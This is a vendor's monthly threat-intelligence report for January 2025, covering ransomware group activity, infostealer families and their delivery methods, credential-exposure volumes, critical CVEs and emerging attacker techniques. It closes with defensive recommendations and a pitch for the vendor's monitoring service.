Monthly Threat Landscape Report: January 2025

Executive Summary

The January 2025 threat landscape report from Revealer.US covers activity observed across underground markets, leak sites, stealer log ecosystems, and exploit chatter during the reporting window. This month saw a sharp uptick in ransomware extortion volume, continued dominance of Lumma and RedLine in the infostealer ecosystem, and the ingestion of more than 420 million new credentials into our exposure database. Zero-day activity centered on enterprise networking appliances and collaboration platforms, while initial access brokers shifted pricing upward as demand outpaced supply.

Security teams should prioritize patching two critical CVEs disclosed this month, review exposure for any accounts observed in the new breach corpuses, and prepare detections for the TTP shifts documented in the Emerging Techniques section. For organizations that need continuous visibility into these feeds, this threat intelligence report is the monthly snapshot; our platform provides the live view.

Ransomware Activity

Ransomware leak site postings climbed 18 percent month over month, with 312 unique victim disclosures observed across tracked groups. Manufacturing, healthcare, and professional services were the most targeted verticals, together accounting for 58 percent of postings.

Top Active Groups

• LockBit 3.0: 47 claimed victims this month. Despite ongoing law enforcement pressure from Operation Cronos, the affiliate network continues to post victims. Notable disclosures included a mid-market European logistics provider and a US regional hospital system.
• RansomHub: 41 victims. RansomHub has absorbed affiliates from defunct operations and now rivals LockBit in raw volume. Average ransom demands trend higher, with several reported figures in the 8 million USD range.
• Play: 28 victims, continuing its consistent mid-pack performance with a preference for manufacturing and construction targets.
• Akira: 24 victims, with a notable focus on VPN appliance exploitation for initial access.
• Qilin: 22 victims. Qilin has matured operationally and introduced a cross-platform Rust variant targeting ESXi.
• BlackSuit: 17 victims, including a high profile services firm whose data was auctioned after negotiations failed.

Notable Incidents

One particularly disruptive incident involved a North American food distributor whose operational systems were encrypted during peak shipping windows, cascading into downstream grocery chains. Another involved a healthcare network where patient scheduling and imaging were offline for nine days. Both are reminders that ransomware remains primarily a business continuity threat, not just a data confidentiality threat.

Infostealer Campaigns

The infostealer ecosystem continues to professionalize. Three families dominate the log volume reaching underground marketplaces and Telegram channels.

Lumma Stealer

Lumma surpassed RedLine this month as the single largest contributor of fresh stealer logs, accounting for approximately 38 percent of new logs ingested. Distribution vectors include fake CAPTCHA lures ("verify you are human by pressing Win+R"), cracked software bundles, and YouTube comment spam linking to fake installers. Lumma operators introduced a new panel version this month with improved evasion against common EDR vendors.

RedLine

RedLine accounted for roughly 29 percent of new logs. Despite the November 2024 international takedown operation against RedLine infrastructure, rebranded and forked variants continue to operate. The marketplace has fragmented rather than collapsed, a pattern we saw previously with Raccoon Stealer.

Vidar and StealC

Vidar contributed 14 percent of logs, with StealC at 11 percent. Both are increasingly sold bundled with loaders and crypto drainers in MaaS subscription packages priced at 150 to 300 USD per month.

Distribution Trends

• SEO poisoning for software keywords (AnyDesk, Notion, Figma, OBS) remains the top delivery mechanism.
• Malvertising via Google Ads continues despite platform enforcement, with operators rapidly rotating accounts.
• ClickFix and fake CAPTCHA lures expanded beyond consumer targets into corporate help desk impersonation.

Credential Exposures

Revealer.US ingested 420 million new credential records during the reporting window. This includes fresh stealer log entries, newly surfaced breach corpuses, and continuous collection from paste sites and leak channels.

Highlights:

1. New breach corpuses: Two previously undisclosed data sets surfaced on forums, together containing 87 million email/password pairs tied to ecommerce and SaaS platforms.
2. Stealer log additions: 290 million credential pairs extracted from infostealer logs, representing activity across an estimated 2.1 million infected devices.
3. Combo list compilations: 43 million records from recompiled combo lists, useful for correlation but lower signal than fresh logs.

For organizations monitoring their domains through Revealer.US, January's exposure deltas were concentrated in finance, gaming, and education sectors. Security teams should expect credential stuffing follow-on activity over the next 30 to 60 days targeting accounts that appeared in this month's ingest.

Zero-Day and CVE Highlights

Two critical vulnerabilities dominated the patching conversation this month.

CVE-2024-57892

An unauthenticated remote code execution flaw in a widely deployed enterprise VPN appliance. Exploitation was observed in the wild within 48 hours of disclosure, with both Akira and a suspected Scattered Spider subcluster chaining the vulnerability for initial access. Patch immediately; if patching is delayed, restrict management interface exposure and hunt for indicators of prior compromise.

CVE-2024-58104

A deserialization flaw in a popular collaboration and file sharing platform allowing authenticated attackers to escalate to SYSTEM. Public proof-of-concept code was released within 72 hours. Cl0p was observed testing the vulnerability against exposed instances, consistent with their historical preference for file transfer and collaboration platform zero-days (MOVEit, GoAnywhere, Accellion).

Additional CVEs to Watch

• CVE-2024-56721: Privilege escalation in a major Linux container runtime.
• CVE-2024-55319: Authentication bypass in a network attached storage vendor, actively exploited by an unattributed ransomware affiliate.
• CVE-2024-54402: Browser sandbox escape reported to a major vendor and patched out of band.

Emerging TTPs

Several tradecraft shifts are worth highlighting for detection engineering teams.

• T1566.002 (Spearphishing Link) via Microsoft Teams: APT29 and multiple criminal clusters expanded Teams based social engineering, impersonating IT support to coax users into running remote assistance sessions.
• T1078.004 (Valid Accounts - Cloud Accounts): Scattered Spider continues to refine its SIM swap to SSO pipeline, with observed pivots through help desk social engineering into Okta and Azure AD.
• T1485 (Data Destruction): Several ransomware affiliates are now deploying wipers alongside encryptors when negotiations fail, eliminating the possibility of silent recovery.
• T1027.013 (Encrypted/Encoded File) via WebAssembly: A small but rising share of loaders embed payloads inside WASM modules to bypass static detection.
• T1556.006 (MFA Request Generation): MFA fatigue attacks remain common, but we are also seeing token theft via adversary in the middle kits paired with real time session replay.

Recommendations for Security Teams

1. Patch CVE-2024-57892 and CVE-2024-58104 as priority zero; both have in-the-wild exploitation.
2. Query your credential exposure monitoring for any new hits tied to executive, privileged, or service accounts that surfaced in this month's ingest.
3. Review Teams and collaboration platform external access policies. If external federation is on by default, consider restricting it.
4. Update help desk verification procedures to defeat SIM swap and social engineering pivots into SSO.
5. Ensure EDR is detecting Lumma and StealC loader patterns; new panel versions have altered some telemetry signatures.
6. Review IOCs published by CISA and commercial feeds this month for the ransomware groups listed above; block known infrastructure at the perimeter.
7. Run a tabletop exercise covering a VPN appliance compromise into ransomware scenario; it remains the most likely path to a major incident in the coming quarter.

Conclusion

January 2025 brought no single catastrophic event, but it did bring steady escalation across every dimension of the threat landscape: more ransomware, more stealer logs, more credentials exposed, and more in the wild exploitation of newly disclosed CVEs. The attackers are not slowing down, and neither should your monitoring cadence. Monthly reports like this one are a useful rear view mirror, but they are not a substitute for live visibility into the feeds that matter to your organization.

For continuous monitoring of credential exposure, stealer logs, and breach data tied to your domains, see our pricing or start immediately with a free account.

Want continuous visibility into the threats in this report? Start a free trial of Revealer.US and get real time alerts when your credentials surface in the wild.